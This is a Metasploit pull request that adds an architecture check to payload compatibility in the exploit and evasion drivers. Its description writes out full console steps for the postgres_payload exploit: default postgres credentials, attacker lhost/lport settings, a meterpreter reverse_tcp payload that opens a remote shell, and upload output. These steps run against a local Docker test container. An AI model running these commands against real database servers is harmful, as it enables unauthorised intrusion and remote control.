### PR TITLE
Update payload compatibility check to include arch

### DIFF
--- a/lib/msf/core/evasion_driver.rb
+++ b/lib/msf/core/evasion_driver.rb
@@ -38,8 +38,14 @@ class EvasionDriver
   # current evasion module.  Assumes that target_idx is valid.
   #
   def compatible_payload?(payload)
-    evasion_platform = evasion.targets[target_idx].platform || evasion.platform
-    return ((payload.platform & evasion_platform).empty? == false)
+    target = evasion.targets[target_idx]
+    evasion_platform = target.platform || evasion.platform
+    evasion_arch = target.arch || evasion.arch
+
+    supported_platforms = payload.platform & evasion_platform
+    supported_arch = payload.arch & evasion_arch
+
+    !supported_platforms.empty? && !supported_arch.empty?
   end
 
   def validate

--- a/lib/msf/core/exploit_driver.rb
+++ b/lib/msf/core/exploit_driver.rb
@@ -53,9 +53,14 @@ class ExploitDriver
   #
   def compatible_payload?(payload)
     # Try to use the target's platform in preference of the exploit's
-    exp_platform = exploit.targets[target_idx].platform || exploit.platform
+    target = exploit.targets[target_idx]
+    exp_platform = target.platform || exploit.platform
+    exp_arch = target.arch || exploit.arch
 
-    return ((payload.platform & exp_platform).empty? == false)
+    supported_platforms = payload.platform & exp_platform
+    supported_arch = payload.arch & exp_arch
+
+    !supported_platforms.empty? && !supported_arch.empty?
   end
 
   ##


### PR DESCRIPTION
Spotted as part of https://github.com/rapid7/metasploit-framework/issues/15557

### Before

When the user uses the following options:
```
use exploit/linux/postgres/postgres_payload
set username postgres
set password postgres
set rhost 192.168.123.6
set rport 5432
set database postgres
set lhost 192.168.123.1
set lport 5000
set target Linux\ x86_64
run
```

The payload will be set to `linux/x86/meterpreter/reverse_tcp` still, which isn't a compatible architecture. 

The module will continue to run, and not get a shell as the architecture is wrong:
```
msf6 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] 192.168.123.6:5500 - PostgreSQL 13.1 (Debian 13.1-1.pgdg100+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3.0, 64-bit
[*] Uploaded as /tmp/nWUyGoHW.so, should be cleaned up automatically
[*] Exploit completed, but no session was created.
```

### After

Architecture is validated, and the user is notified:
```
msf6 exploit(linux/postgres/postgres_payload) > run

[-] Exploit failed: linux/x86/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
```

## Verification

Run a docker container:
```
docker run --rm -p 5500:5432 -e POSTGRES_PASSWORD=postgres postgres:13.1
```

Verify the validation message appears:

```
use exploit/linux/postgres/postgres_payload
set username postgres
set password postgres
set rhost 192.168.123.6
set rport 5432
set database postgres
set lhost 192.168.123.1
set lport 5000
set target Linux\ x86_64
run
```

Verify the validation message disappears after setting a valid payload, and a meterpreter session is opened:
```
set payload linux/x64/meterpreter/reverse_tcp
run
```